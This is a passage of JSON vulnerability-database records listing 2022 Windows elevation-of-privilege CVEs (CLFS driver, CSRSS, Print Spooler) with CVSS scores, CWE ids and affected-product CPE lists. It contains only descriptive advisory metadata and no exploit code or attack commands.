"id": "MS:CVE-2022-35803", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35803", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-29T21:16:31", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-35803.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-13T07:00:00", "id": "MS:CVE-2022-37969", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37969", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-09-28T20:41:54", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22047, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22026", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-09-28T19:58:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-22026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22026", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-09-28T20:41:53", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22047.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22049", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-09-28T19:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-22049", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22049", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-16T16:05:35", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22047", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-16T13:50:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-22047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*"]}, {"lastseen": "2022-09-22T21:52:14", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22041", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-09-22T19:04:00", "cpe": ["cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-22041", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22041", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-07-16T16:05:42", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22041, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22022", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-16T13:21:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-22022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22022", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*"]}, {"lastseen": "2022-07-20T17:05:51", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-30206", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-20T14:34:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809"], "id": "CVE-2022-30206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30206", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", 